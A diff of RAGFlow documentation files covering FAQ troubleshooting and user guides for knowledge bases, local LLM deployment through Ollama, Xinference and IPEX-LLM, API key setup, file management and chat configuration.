You limit what the system responds to what you specify in **Empty response** if nothing is retrieved from your knowledge base. If you do not specify anything in **Empty response**, you let your LLM improvise, giving it a chance to hallucinate.
|
||||
|
||||
### Can I set the base URL for OpenAI somewhere?
|
||||
|
||||

|
||||
|
||||
|
||||
### How to run RAGFlow with a locally deployed LLM?
|
||||
|
||||
You can use Ollama to deploy local LLM. See [here](https://github.com/infiniflow/ragflow/blob/main/docs/ollama.md) for more information.
|
||||
|
||||
### How to link up ragflow and ollama servers?
|
||||
|
||||
- If RAGFlow is locally deployed, ensure that your RAGFlow and Ollama are in the same LAN.
|
||||
- If you are using our online demo, ensure that the IP address of your Ollama server is public and accessible.
|
||||
|
||||
### How to configure RAGFlow to respond with 100% matched results, rather than utilizing LLM?
|
||||
|
||||
1. Click the **Knowledge Base** tab in the middle top of the page.
|
||||
2. Right click the desired knowledge base to display the **Configuration** dialogue.
|
||||
3. Choose **Q&A** as the chunk method and click **Save** to confirm your change.
|
||||
|
||||
## Debugging
|
||||
|
||||
### How to handle `WARNING: can't find /raglof/rag/res/borker.tm`?
|
||||
|
||||
Ignore this warning and continue. All system warnings can be ignored.
|
||||
|
||||
### How to handle `Realtime synonym is disabled, since no redis connection`?
|
||||
|
||||
Ignore this warning and continue. All system warnings can be ignored.
|
||||
|
||||

|
||||
|
||||
### Why does it take so long to parse a 2MB document?
|
||||
|
||||
Parsing requests have to wait in queue due to limited server resources. We are currently enhancing our algorithms and increasing computing power.
|
||||
|
||||
### Why does my document parsing stall at under one percent?
|
||||
|
||||
If your RAGFlow is deployed *locally*, try the following:
|
||||
|
||||
1. Check the log of your RAGFlow server to see if it is running properly:
|
||||
```bash
|
||||
docker logs -f ragflow-server
|
||||
```
|
||||
2. Check if the **tast_executor.py** process exist.
|
||||
3. Check if your RAGFlow server can access hf-mirror.com or huggingface.com.
|
||||
|
||||
### How to handle `Index failure`?
|
||||
|
||||
An index failure usually indicates an unavailable Elasticsearch service.
|
||||
|
||||
### How to check the log of RAGFlow?
|
||||
|
||||
```bash
|
||||
tail -f path_to_ragflow/docker/ragflow-logs/rag/*.log
|
||||
```
|
||||
|
||||
### How to check the status of each component in RAGFlow?
|
||||
|
||||
```bash
|
||||
$ docker ps
|
||||
```
|
||||
*The system displays the following if all your RAGFlow components are running properly:*
|
||||
|
||||
```
|
||||
5bc45806b680 infiniflow/ragflow:v0.2.0 "./entrypoint.sh" 11 hours ago Up 11 hours 0.0.0.0:80->80/tcp, :::80->80/tcp, 0.0.0.0:443->443/tcp, :::443->443/tcp, 0.0.0.0:9380->9380/tcp, :::9380->9380/tcp ragflow-server
|
||||
91220e3285dd docker.elastic.co/elasticsearch/elasticsearch:8.11.3 "/bin/tini -- /usr/l…" 11 hours ago Up 11 hours (healthy) 9300/tcp, 0.0.0.0:9200->9200/tcp, :::9200->9200/tcp ragflow-es-01
|
||||
d8c86f06c56b mysql:5.7.18 "docker-entrypoint.s…" 7 days ago Up 16 seconds (healthy) 0.0.0.0:3306->3306/tcp, :::3306->3306/tcp ragflow-mysql
|
||||
cd29bcb254bc quay.io/minio/minio:RELEASE.2023-12-20T01-00-02Z "/usr/bin/docker-ent…" 2 weeks ago Up 11 hours 0.0.0.0:9001->9001/tcp, :::9001->9001/tcp, 0.0.0.0:9000->9000/tcp, :::9000->9000/tcp ragflow-minio
|
||||
```
|
||||
|
||||
### How to handle `Exception: Can't connect to ES cluster`?
|
||||
|
||||
1. Check the status of your Elasticsearch component:
|
||||
|
||||
```bash
|
||||
$ docker ps
|
||||
```
|
||||
*The status of a 'healthy' Elasticsearch component in your RAGFlow should look as follows:*
|
||||
```
|
||||
91220e3285dd docker.elastic.co/elasticsearch/elasticsearch:8.11.3 "/bin/tini -- /usr/l…" 11 hours ago Up 11 hours (healthy) 9300/tcp, 0.0.0.0:9200->9200/tcp, :::9200->9200/tcp ragflow-es-01
|
||||
```
|
||||
|
||||
2. If your container keeps restarting, ensure `vm.max_map_count` >= 262144 as per [this README](https://github.com/infiniflow/ragflow?tab=readme-ov-file#-start-up-the-server).
|
||||
|
||||
|
||||
3. If your issue persists, ensure that the ES host setting is correct:
|
||||
|
||||
- If you are running RAGFlow with Docker, it is in **docker/service_conf.yml**. Set it as follows:
|
||||
```
|
||||
es:
|
||||
hosts: 'http://es01:9200'
|
||||
```
|
||||
- If you run RAGFlow outside of Docker, verify the ES host setting in **conf/service_conf.yml** using:
|
||||
```bash
|
||||
curl http://<IP_OF_ES>:<PORT_OF_ES>
|
||||
```
|
||||
|
||||
|
||||
### How to handle `{"data":null,"retcode":100,"retmsg":"<NotFound '404: Not Found'>"}`?
|
||||
|
||||
Your IP address or port number may be incorrect. If you are using the default configurations, enter http://<IP_OF_YOUR_MACHINE> (**NOT `localhost`, NOT 9380, AND NO PORT NUMBER REQUIRED!**) in your browser. This should work.
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
|
||||
8
docs/guides/_category_.json
Normal file
8
docs/guides/_category_.json
Normal file
@ -0,0 +1,8 @@
|
||||
{
|
||||
"label": "User Guides",
|
||||
"position": 2,
|
||||
"link": {
|
||||
"type": "generated-index",
|
||||
"description": "RAGFlow User Guides"
|
||||
}
|
||||
}
|
||||
138
docs/guides/configure_knowledge_base.md
Normal file
138
docs/guides/configure_knowledge_base.md
Normal file
@ -0,0 +1,138 @@
|
||||
---
|
||||
sidebar_position: 1
|
||||
slug: /configure_knowledge_base
|
||||
---
|
||||
|
||||
# Configure a knowledge base
|
||||
|
||||
Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. RAGFlow's AI chats are based on knowledge bases. Each of RAGFlow's knowledge bases serves as a knowledge source, *parsing* files uploaded from your local machine and file references generated in **File Management** into the real 'knowledge' for future AI chats. This guide demonstrates some basic usages of the knowledge base feature, covering the following topics:
|
||||
|
||||
- Create a knowledge base
|
||||
- Configure a knowledge base
|
||||
- Search for a knowledge base
|
||||
- Delete a knowledge base
|
||||
|
||||
## Create knowledge base
|
||||
|
||||
With multiple knowledge bases, you can build more flexible, diversified question answering. To create your first knowledge base:
|
||||
|
||||

|
||||
|
||||
_Each time a knowledge base is created, a folder with the same name is generated in the **root/.knowledgebase** directory._
|
||||
|
||||
## Configure knowledge base
|
||||
|
||||
The following screen shot shows the configuration page of a knowledge base. A proper configuration of your knowledge base is crucial for future AI chats. For example, choosing the wrong embedding model or chunk method would cause unexpected semantic loss or mismatched answers in chats.
|
||||
|
||||

|
||||
|
||||
This section covers the following topics:
|
||||
|
||||
- Select chunk method
|
||||
- Select embedding model
|
||||
- Upload file
|
||||
- Parse file
|
||||
- Intervene with file parsing results
|
||||
- Run retrieval testing
|
||||
|
||||
### Select chunk method
|
||||
|
||||
RAGFlow offers multiple chunking template to facilitate chunking files of different layouts and ensure semantic integrity. In **Chunk method**, you can choose the default template that suits the layouts and formats of your files. The following table shows the descriptions and the compatible file formats of each supported chunk template:
|
||||
|
||||
| **Template** | Description | File format |
|
||||
| ------------ | ------------------------------------------------------------ | ---------------------------------------------------- |
|
||||
| General | Files are consecutively chunked based on a preset chunk token number. | DOCX, EXCEL, PPT, PDF, TXT, JPEG, JPG, PNG, TIF, GIF |
|
||||
| Q&A | | EXCEL, CSV/TXT |
|
||||
| Manual | | PDF |
|
||||
| Table | | EXCEL, CSV/TXT |
|
||||
| Paper | | PDF |
|
||||
| Book | | DOCX, PDF, TXT |
|
||||
| Laws | | DOCX, PDF, TXT |
|
||||
| Presentation | | PDF, PPTX |
|
||||
| Picture | | JPEG, JPG, PNG, TIF, GIF |
|
||||
| One | The entire document is chunked as one. | DOCX, EXCEL, PDF, TXT |
|
||||
|
||||
You can also change the chunk template for a particular file on the **Datasets** page.
|
||||
|
||||

|
||||
|
||||
### Select embedding model
|
||||
|
||||
An embedding model builds vector index on file chunks. Once you have chosen an embedding model and used it to parse a file, you are no longer allowed to change it. To switch to a different embedding model, you *must* deletes all completed file chunks in the knowledge base. The obvious reason is that we must *ensure* that all files in a specific knowledge base are parsed using the *same* embedding model (ensure that they are compared in the same embedding space).
|
||||
|
||||
The following embedding models can be deployed locally:
|
||||
|
||||
- BAAI/bge-large-zh-v1.5
|
||||
- BAAI/bge-base-en-v1.5
|
||||
- BAAI/bge-large-en-v1.5
|
||||
- BAAI/bge-small-en-v1.5
|
||||
- BAAI/bge-small-zh-v1.5
|
||||
- jinaai/jina-embeddings-v2-base-en
|
||||
- jinaai/jina-embeddings-v2-small-en
|
||||
- nomic-ai/nomic-embed-text-v1.5
|
||||
- sentence-transformers/all-MiniLM-L6-v2
|
||||
- maidalun1020/bce-embedding-base_v1
|
||||
|
||||
### Upload file
|
||||
|
||||
- RAGFlow's **File Management** allows you to link a file to multiple knowledge bases, in which case each target knowledge base holds a reference to the file.
|
||||
- In **Knowledge Base**, you are also given the option of uploading a single file or a folder of files (bulk upload) from your local machine to a knowledge base, in which case the knowledge base holds file copies.
|
||||
|
||||
While uploading files directly to a knowledge base seems more convenient, we *highly* recommend uploading files to **File Management** and then linking them to the target knowledge bases. This way, you can avoid permanently deleting files uploaded to the knowledge base.
|
||||
|
||||
### Parse file
|
||||
|
||||
File parsing is a crucial topic in knowledge base configuration. The meaning of file parsing in RAGFlow is twofold: chunking files based on file layout and building embedding and full-text (keyword) indexes on these chunks. After having selected the chunk method and embedding model, you can start parsing an file:
|
||||
|
||||

|
||||
|
||||
- Click the play button next to **UNSTART** to start file parsing.
|
||||
- Click the red-cross icon and then refresh, if your file parsing stalls for a long time.
|
||||
- As shown above, RAGFlow allows you to use a different chunk method for a particular file, offering flexibility beyond the default method.
|
||||
- As shown above, RAGFlow allows you to enable or disable individual files, offering finer control over knowledge base-based AI chats.
|
||||
|
||||
### Intervene with file parsing results
|
||||
|
||||
RAGFlow features visibility and explainability, allowing you to view the chunking results and intervene where necessary. To do so:
|
||||
|
||||
1. Click on the file that completes file parsing to view the chunking results:
|
||||
|
||||
_You are taken to the **Chunk** page:_
|
||||
|
||||

|
||||
|
||||
2. Hover over each snapshot for a quick view of each chunk.
|
||||
|
||||
3. Double click the chunked texts to add keywords or make *manual* changes where necessary:
|
||||
|
||||

|
||||
|
||||
4. In Retrieval testing, ask a quick question in **Test text** to double check if your configurations work:
|
||||
|
||||
_As you can tell from the following, RAGFlow responds with truthful citations._
|
||||
|
||||

|
||||
|
||||
### Run retrieval testing
|
||||
|
||||
RAGFlow uses multiple recall of both full-text search and vector search in its chats. Prior to setting up an AI chat, consider adjusting the following parameters to ensure that the intended information always turns up in answers:
|
||||
|
||||
- Similarity threshold: Chunks with similarities below the threshold will be filtered. Defaultly set to 0.2.
|
||||
- Vector similarity weight: The percentage by which vector similarity contributes to the overall score. Defaultly set to 0.3.
|
||||
|
||||

|
||||
|
||||
## Search for knowledge base
|
||||
|
||||
As of RAGFlow v0.8.0, the search feature is still in a rudimentary form, supporting only knowledge base search by name.
|
||||
|
||||

|
||||
|
||||
## Delete knowledge base
|
||||
|
||||
You are allowed to delete a knowledge base. Hover your mouse over the three dot of the intended knowledge base card and the **Delete** option appears. Once you delete a knowledge base, the associated folder under **root/.knowledge** directory is AUTOMATICALLY REMOVED. The consequence is:
|
||||
|
||||
- The files uploaded directly to the knowledge base are gone;
|
||||
- The file references, which you created from within **File Management**, are gone, but the associated files still exist in **File Management**.
|
||||
|
||||

|
||||
283
docs/guides/deploy_local_llm.md
Normal file
283
docs/guides/deploy_local_llm.md
Normal file
@ -0,0 +1,283 @@
|
||||
---
|
||||
sidebar_position: 5
|
||||
slug: /deploy_local_llm
|
||||
---
|
||||
|
||||
# Deploy a local LLM
|
||||
|
||||
RAGFlow supports deploying models locally using Ollama or Xinference. If you have locally deployed models to leverage or wish to enable GPU or CUDA for inference acceleration, you can bind Ollama or Xinference into RAGFlow and use either of them as a local "server" for interacting with your local models.
|
||||
|
||||
RAGFlow seamlessly integrates with Ollama and Xinference, without the need for further environment configurations. You can use them to deploy two types of local models in RAGFlow: chat models and embedding models.
|
||||
|
||||
:::tip NOTE
|
||||
This user guide does not intend to cover much of the installation or configuration details of Ollama or Xinference; its focus is on configurations inside RAGFlow. For the most current information, you may need to check out the official site of Ollama or Xinference.
|
||||
:::
|
||||
|
||||
## Deploy a local model using Ollama
|
||||
|
||||
[Ollama](https://github.com/ollama/ollama) enables you to run open-source large language models that you deployed locally. It bundles model weights, configurations, and data into a single package, defined by a Modelfile, and optimizes setup and configurations, including GPU usage.
|
||||
|
||||
:::note
|
||||
- For information about downloading Ollama, see [here](https://github.com/ollama/ollama?tab=readme-ov-file#ollama).
|
||||
- For information about configuring Ollama server, see [here](https://github.com/ollama/ollama/blob/main/docs/faq.md#how-do-i-configure-ollama-server).
|
||||
- For a complete list of supported models and variants, see the [Ollama model library](https://ollama.com/library).
|
||||
:::
|
||||
|
||||
To deploy a local model, e.g., **Llama3**, using Ollama:
|
||||
|
||||
### 1. Check firewall settings
|
||||
|
||||
Ensure that your host machine's firewall allows inbound connections on port 11434. For example:
|
||||
|
||||
```bash
|
||||
sudo ufw allow 11434/tcp
|
||||
```
|
||||
### 2. Ensure Ollama is accessible
|
||||
|
||||
Restart system and use curl or your web browser to check if the service URL of your Ollama service at `http://localhost:11434` is accessible.
|
||||
|
||||
```bash
|
||||
Ollama is running
|
||||
```
|
||||
|
||||
### 3. Run your local model
|
||||
|
||||
```bash
|
||||
ollama run llama3
|
||||
```
|
||||
<details>
|
||||
<summary>If your Ollama is installed through Docker, run the following instead:</summary>
|
||||
|
||||
```bash
|
||||
docker exec -it ollama ollama run llama3
|
||||
```
|
||||
</details>
|
||||
|
||||
### 4. Add Ollama
|
||||
|
||||
In RAGFlow, click on your logo on the top right of the page **>** **Model Providers** and add Ollama to RAGFlow:
|
||||
|
||||

|
||||
|
||||
|
||||
### 5. Complete basic Ollama settings
|
||||
|
||||
In the popup window, complete basic settings for Ollama:
|
||||
|
||||
1. Because **llama3** is a chat model, choose **chat** as the model type.
|
||||
2. Ensure that the model name you enter here *precisely* matches the name of the local model you are running with Ollama.
|
||||
3. Ensure that the base URL you enter is accessible to RAGFlow.
|
||||
4. OPTIONAL: Switch on the toggle under **Does it support Vision?** if your model includes an image-to-text model.
|
||||
|
||||
:::caution NOTE
|
||||
- If your Ollama and RAGFlow run on the same machine, use `http://localhost:11434` as base URL.
|
||||
- If your Ollama and RAGFlow run on the same machine and Ollama is in Docker, use `http://host.docker.internal:11434` as base URL.
|
||||
- If your Ollama runs on a different machine from RAGFlow, use `http://<IP_OF_OLLAMA_MACHINE>:11434` as base URL.
|
||||
:::
|
||||
|
||||
:::danger WARNING
|
||||
If your Ollama runs on a different machine, you may also need to set the `OLLAMA_HOST` environment variable to `0.0.0.0` in **ollama.service** (Note that this is *NOT* the base URL):
|
||||
|
||||
```bash
|
||||
Environment="OLLAMA_HOST=0.0.0.0"
|
||||
```
|
||||
|
||||
See [this guide](https://github.com/ollama/ollama/blob/main/docs/faq.md#how-do-i-configure-ollama-server) for more information.
|
||||
:::
|
||||
|
||||
:::caution WARNING
|
||||
Improper base URL settings will trigger the following error:
|
||||
```bash
|
||||
Max retries exceeded with url: /api/chat (Caused by NewConnectionError('<urllib3.connection.HTTPConnection object at 0xffff98b81ff0>: Failed to establish a new connection: [Errno 111] Connection refused'))
|
||||
```
|
||||
:::
|
||||
|
||||
### 6. Update System Model Settings
|
||||
|
||||
Click on your logo **>** **Model Providers** **>** **System Model Settings** to update your model:
|
||||
|
||||
*You should now be able to find **llama3** from the dropdown list under **Chat model**.*
|
||||
|
||||
> If your local model is an embedding model, you should find your local model under **Embedding model**.
|
||||
|
||||
### 7. Update Chat Configuration
|
||||
|
||||
Update your chat model accordingly in **Chat Configuration**:
|
||||
|
||||
> If your local model is an embedding model, update it on the configruation page of your knowledge base.
|
||||
|
||||
## Deploy a local model using Xinference
|
||||
|
||||
Xorbits Inference([Xinference](https://github.com/xorbitsai/inference)) enables you to unleash the full potential of cutting-edge AI models.
|
||||
|
||||
:::note
|
||||
- For information about installing Xinference Ollama, see [here](https://inference.readthedocs.io/en/latest/getting_started/).
|
||||
- For a complete list of supported models, see the [Builtin Models](https://inference.readthedocs.io/en/latest/models/builtin/).
|
||||
:::
|
||||
|
||||
To deploy a local model, e.g., **Mistral**, using Xinference:
|
||||
|
||||
### 1. Check firewall settings
|
||||
|
||||
Ensure that your host machine's firewall allows inbound connections on port 9997.
|
||||
|
||||
### 2. Start an Xinference instance
|
||||
|
||||
```bash
|
||||
$ xinference-local --host 0.0.0.0 --port 9997
|
||||
```
|
||||
|
||||
### 3. Launch your local model
|
||||
|
||||
Launch your local model (**Mistral**), ensuring that you replace `${quantization}` with your chosen quantization method
|
||||
:
|
||||
```bash
|
||||
$ xinference launch -u mistral --model-name mistral-v0.1 --size-in-billions 7 --model-format pytorch --quantization ${quantization}
|
||||
```
|
||||
### 4. Add Xinference
|
||||
|
||||
In RAGFlow, click on your logo on the top right of the page **>** **Model Providers** and add Xinference to RAGFlow:
|
||||
|
||||

|
||||
|
||||
### 5. Complete basic Xinference settings
|
||||
|
||||
Enter an accessible base URL, such as `http://<your-xinference-endpoint-domain>:9997/v1`.
|
||||
|
||||
### 6. Update System Model Settings
|
||||
|
||||
Click on your logo **>** **Model Providers** **>** **System Model Settings** to update your model.
|
||||
|
||||
*You should now be able to find **mistral** from the dropdown list under **Chat model**.*
|
||||
|
||||
> If your local model is an embedding model, you should find your local model under **Embedding model**.
|
||||
|
||||
### 7. Update Chat Configuration
|
||||
|
||||
Update your chat model accordingly in **Chat Configuration**:
|
||||
|
||||
> If your local model is an embedding model, update it on the configruation page of your knowledge base.
|
||||
|
||||
## Deploy a local model using IPEX-LLM
|
||||
|
||||
IPEX-LLM([IPEX-LLM](https://github.com/intel-analytics/ipex-llm)) is a PyTorch library for running LLM on Intel CPU and GPU (e.g., local PC with iGPU, discrete GPU such as Arc, Flex and Max) with very low latency
|
||||
|
||||
To deploy a local model, eg., **Qwen2**, using IPEX-LLM, follow the steps below:
|
||||
|
||||
### 1. Check firewall settings
|
||||
|
||||
Ensure that your host machine's firewall allows inbound connections on port 11434. For example:
|
||||
|
||||
```bash
|
||||
sudo ufw allow 11434/tcp
|
||||
```
|
||||
|
||||
### 2. Install and Start Ollama serve using IPEX-LLM
|
||||
|
||||
#### 2.1 Install IPEX-LLM for Ollama
|
||||
|
||||
IPEX-LLM's support for `ollama` now is available for Linux system and Windows system.
|
||||
|
||||
Visit [Run llama.cpp with IPEX-LLM on Intel GPU Guide](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md), and follow the instructions in section [Prerequisites](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md#0-prerequisites) to setup and section [Install IPEX-LLM cpp](https://github.com/intel-analytics/ipex-llm/blob/main/docs/mddocs/Quickstart/llama_cpp_quickstart.md#1-install-ipex-llm-for-llamacpp) to install the IPEX-LLM with Ollama binaries.
|
||||
|
||||
**After the installation, you should have created a conda environment, named `llm-cpp` for instance, for running `ollama` commands with IPEX-LLM.**
|
||||
|
||||
#### 2.2 Initialize Ollama
|
||||
|
||||
Activate the `llm-cpp` conda environment and initialize Ollama by executing the commands below. A symbolic link to `ollama` will appear in your current directory.
|
||||
|
||||
- For **Linux users**:
|
||||
|
||||
```bash
|
||||
conda activate llm-cpp
|
||||
init-ollama
|
||||
```
|
||||
|
||||
- For **Windows users**:
|
||||
|
||||
Please run the following command with **administrator privilege in Miniforge Prompt**.
|
||||
|
||||
```cmd
|
||||
conda activate llm-cpp
|
||||
init-ollama.bat
|
||||
```
|
||||
|
||||
> [!NOTE]
|
||||
> If you have installed higher version `ipex-llm[cpp]` and want to upgrade your ollama binary file, don't forget to remove old binary files first and initialize again with `init-ollama` or `init-ollama.bat`.
|
||||
|
||||
**Now you can use this executable file by standard ollama's usage.**
|
||||
|
||||
#### 2.3 Run Ollama Serve
|
||||
|
||||
You may launch the Ollama service as below:
|
||||
|
||||
- For **Linux users**:
|
||||
|
||||
```bash
|
||||
export OLLAMA_NUM_GPU=999
|
||||
export no_proxy=localhost,127.0.0.1
|
||||
export ZES_ENABLE_SYSMAN=1
|
||||
source /opt/intel/oneapi/setvars.sh
|
||||
export SYCL_CACHE_PERSISTENT=1
|
||||
|
||||
./ollama serve
|
||||
```
|
||||
|
||||
- For **Windows users**:
|
||||
|
||||
Please run the following command in Miniforge Prompt.
|
||||
|
||||
```cmd
|
||||
set OLLAMA_NUM_GPU=999
|
||||
set no_proxy=localhost,127.0.0.1
|
||||
set ZES_ENABLE_SYSMAN=1
|
||||
set SYCL_CACHE_PERSISTENT=1
|
||||
|
||||
ollama serve
|
||||
```
|
||||
|
||||
|
||||
> Please set environment variable `OLLAMA_NUM_GPU` to `999` to make sure all layers of your model are running on Intel GPU, otherwise, some layers may run on CPU.
|
||||
|
||||
|
||||
> If your local LLM is running on Intel Arc™ A-Series Graphics with Linux OS (Kernel 6.2), it is recommended to additionaly set the following environment variable for optimal performance before executing `ollama serve`:
|
||||
>
|
||||
> ```bash
|
||||
> export SYCL_PI_LEVEL_ZERO_USE_IMMEDIATE_COMMANDLISTS=1
|
||||
> ```
|
||||
|
||||
|
||||
> To allow the service to accept connections from all IP addresses, use `OLLAMA_HOST=0.0.0.0 ./ollama serve` instead of just `./ollama serve`.
|
||||
|
||||
The console will display messages similar to the following:
|
||||
|
||||

|
||||
|
||||
### 3. Pull and Run Ollama Model
|
||||
|
||||
Keep the Ollama service on and open another terminal and run `./ollama pull <model_name>` in Linux (`ollama.exe pull <model_name>` in Windows) to automatically pull a model. e.g. `qwen2:latest`:
|
||||
|
||||

|
||||
|
||||
#### Run Ollama Model
|
||||
|
||||
- For **Linux users**:
|
||||
```bash
|
||||
./ollama run qwen2:latest
|
||||
```
|
||||
|
||||
- For **Windows users**:
|
||||
```cmd
|
||||
ollama run qwen2:latest
|
||||
```
|
||||
### 4. Configure RAGflow to use IPEX-LLM accelerated Ollama
|
||||
|
||||
The confiugraiton follows the steps in
|
||||
|
||||
Ollama Section 4 [Add Ollama](#4-add-ollama),
|
||||
|
||||
Section 5 [Complete basic Ollama settings](#5-complete-basic-ollama-settings),
|
||||
|
||||
Section 6 [Update System Model Settings](#6-update-system-model-settings),
|
||||
|
||||
Section 7 [Update Chat Configuration](#7-update-chat-configuration)
|
||||
63
docs/guides/llm_api_key_setup.md
Normal file
63
docs/guides/llm_api_key_setup.md
Normal file
@ -0,0 +1,63 @@
|
||||
---
|
||||
sidebar_position: 4
|
||||
slug: /llm_api_key_setup
|
||||
---
|
||||
|
||||
# Configure your API key
|
||||
|
||||
An API key is required for RAGFlow to interact with an online AI model. This guide provides information about setting your API key in RAGFlow.
|
||||
|
||||
## Get your API key
|
||||
|
||||
For now, RAGFlow supports the following online LLMs. Click the corresponding link to apply for your API key. Most LLM providers grant newly-created accounts trial credit, which will expire in a couple of months, or a promotional amount of free quota.
|
||||
|
||||
- [OpenAI](https://platform.openai.com/login?launch),
|
||||
- [Tongyi-Qianwen](https://dashscope.console.aliyun.com/model),
|
||||
- [ZHIPU-AI](https://open.bigmodel.cn/),
|
||||
- [Moonshot](https://platform.moonshot.cn/docs),
|
||||
- [DeepSeek](https://platform.deepseek.com/api-docs/),
|
||||
- [Baichuan](https://www.baichuan-ai.com/home),
|
||||
- [VolcEngine](https://www.volcengine.com/docs/82379).
|
||||
|
||||
:::note
|
||||
If you find your online LLM is not on the list, don't feel disheartened. The list is expanding, and you can [file a feature request](https://github.com/infiniflow/ragflow/issues/new?assignees=&labels=feature+request&projects=&template=feature_request.yml&title=%5BFeature+Request%5D%3A+) with us! Alternatively, if you have customized or locally-deployed models, you can [bind them to RAGFlow using Ollama or Xinference](./deploy_local_llm.md).
|
||||
:::
|
||||
|
||||
## Configure your API key
|
||||
|
||||
You have two options for configuring your API key:
|
||||
|
||||
- Configure it in **service_conf.yaml** before starting RAGFlow.
|
||||
- Configure it on the **Model Providers** page after logging into RAGFlow.
|
||||
|
||||
### Configure API key before starting up RAGFlow
|
||||
|
||||
1. Navigate to **./docker/ragflow**.
|
||||
2. Find entry **user_default_llm**:
|
||||
- Update `factory` with your chosen LLM.
|
||||
- Update `api_key` with yours.
|
||||
- Update `base_url` if you use a proxy to connect to the remote service.
|
||||
3. Reboot your system for your changes to take effect.
|
||||
4. Log into RAGFlow.
|
||||
|
||||
*After logging into RAGFlow, you will find your chosen model appears under **Added models** on the **Model Providers** page.*
|
||||
|
||||
### Configure API key after logging into RAGFlow
|
||||
|
||||
:::caution WARNING
|
||||
After logging into RAGFlow, configuring API key through the **service_conf.yaml** file will no longer take effect.
|
||||
:::
|
||||
|
||||
After logging into RAGFlow, you can *only* configure API Key on the **Model Providers** page:
|
||||
|
||||
1. Click on your logo on the top right of the page **>** **Model Providers**.
|
||||
2. Find your model card under **Models to be added** and click **Add the model**:
|
||||

|
||||
3. Paste your API key.
|
||||
4. Fill in your base URL if you use a proxy to connect to the remote service.
|
||||
5. Click **OK** to confirm your changes.
|
||||
|
||||
:::note
|
||||
If you wish to update an existing API key at a later point:
|
||||

|
||||
:::
|
||||
84
docs/guides/manage_files.md
Normal file
84
docs/guides/manage_files.md
Normal file
@ -0,0 +1,84 @@
|
||||
---
|
||||
sidebar_position: 3
|
||||
slug: /manage_files
|
||||
---
|
||||
|
||||
# Manage files
|
||||
|
||||
Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. RAGFlow's file management allows you to upload files individually or in bulk. You can then link an uploaded file to multiple target knowledge bases. This guide showcases some basic usages of the file management feature.
|
||||
|
||||
## Create folder
|
||||
|
||||
RAGFlow's file management allows you to establish your file system with nested folder structures. To create a folder in the root directory of RAGFlow:
|
||||
|
||||

|
||||
|
||||
> Each knowledge base in RAGFlow has a corresponding folder under the **root/.knowledgebase** directory. You are not allowed to create a subfolder within it.
|
||||
|
||||
## Upload file
|
||||
|
||||
RAGFlow's file management supports file uploads from your local machine, allowing both individual and bulk uploads:
|
||||
|
||||

|
||||
|
||||

|
||||
|
||||
## Preview file
|
||||
|
||||
RAGFlow's file management supports previewing files in the following formats:
|
||||
|
||||
- Documents (PDF, DOCS)
|
||||
- Tables (XLSX)
|
||||
- Pictures (JPEG, JPG, PNG, TIF, GIF)
|
||||
|
||||

|
||||
|
||||
## Link file to knowledge bases
|
||||
|
||||
RAGFlow's file management allows you to *link* an uploaded file to multiple knowledge bases, creating a file reference in each target knowledge base. Therefore, deleting a file in your file management will AUTOMATICALLY REMOVE all related file references across the knowledge bases.
|
||||
|
||||

|
||||
|
||||
You can link your file to one knowledge base or multiple knowledge bases at one time:
|
||||
|
||||

|
||||
|
||||
## Move file to specified folder
|
||||
|
||||
As of RAGFlow v0.8.0, this feature is *not* available.
|
||||
|
||||
## Search files or folders
|
||||
|
||||
As of RAGFlow v0.8.0, the search feature is still in a rudimentary form, supporting only file and folder search in the current directory by name (files or folders in the child directory will not be retrieved).
|
||||
|
||||

|
||||
|
||||
## Rename file or folder
|
||||
|
||||
RAGFlow's file management allows you to rename a file or folder:
|
||||
|
||||

|
||||
|
||||
|
||||
## Delete files or folders
|
||||
|
||||
RAGFlow's file management allows you to delete files or folders individually or in bulk.
|
||||
|
||||
To delete a file or folder:
|
||||
|
||||

|
||||
|
||||
To bulk delete files or folders:
|
||||
|
||||

|
||||
|
||||
> - You are not allowed to delete the **root/.knowledgebase** folder.
|
||||
> - Deleting files that have been linked to knowledge bases will AUTOMATICALLY REMOVE all associated file references across the knowledge bases.
|
||||
|
||||
## Download uploaded file
|
||||
|
||||
RAGFlow's file management allows you to download an uploaded file:
|
||||
|
||||

|
||||
|
||||
> As of RAGFlow v0.8.0, bulk download is not supported, nor can you download an entire folder.
|
||||
59
docs/guides/start_chat.md
Normal file
59
docs/guides/start_chat.md
Normal file
@ -0,0 +1,59 @@
|
||||
---
|
||||
sidebar_position: 2
|
||||
slug: /start_chat
|
||||
---
|
||||
|
||||
# Start an AI chat
|
||||
|
||||
Knowledge base, hallucination-free chat, and file management are the three pillars of RAGFlow. Chats in RAGFlow are based on a particular knowledge base or multiple knowledge bases. Once you have created your knowledge base and finished file parsing, you can go ahead and start an AI conversation.
|
||||
|
||||
## Start an AI chat
|
||||
|
||||
You start an AI conversation by creating an assistant.
|
||||
|
||||
1. Click the **Chat** tab in the middle top of the page **>** **Create an assistant** to show the **Chat Configuration** dialogue *of your next dialogue*.
|
||||
|
||||
> RAGFlow offers you the flexibility of choosing a different chat model for each dialogue, while allowing you to set the default models in **System Model Settings**.
|
||||
|
||||
2. Update **Assistant Setting**:
|
||||
|
||||
- **Assistant name** is the name of your chat assistant. Each assistant corresponds to a dialogue with a unique combination of knowledge bases, prompts, hybrid search configurations, and large model settings.
|
||||
- **Empty response**:
|
||||
- If you wish to *confine* RAGFlow's answers to your knowledge bases, leave a response here. Then when it doesn't retrieve an answer, it *uniformly* responds with what you set here.
|
||||
- If you wish RAGFlow to *improvise* when it doesn't retrieve an answer from your knowledge bases, leave it blank, which may give rise to hallucinations.
|
||||
- **Show Quote**: This is a key feature of RAGFlow and enabled by default. RAGFlow does not work like a black box. instead, it clearly shows the sources of information that its responses are based on.
|
||||
- Select the corresponding knowledge bases. You can select one or multiple knowledge bases, but ensure that they use the same embedding model, otherwise an error would occur.
|
||||
|
||||
3. Update **Prompt Engine**:
|
||||
|
||||
- In **System**, you fill in the prompts for your LLM, you can also leave the default prompt as-is for the beginning.
|
||||
- **Similarity threshold** sets the similarity "bar" for each chunk of text. The default is 0.2. Text chunks with lower similarity scores are filtered out of the final response.
|
||||
- **Vector similarity weight** is set to 0.3 by default. RAGFlow uses a hybrid score system, combining keyword similarity and vector similarity, for evaluating the relevance of different text chunks. This value sets the weight assigned to the vector similarity component in the hybrid score.
|
||||
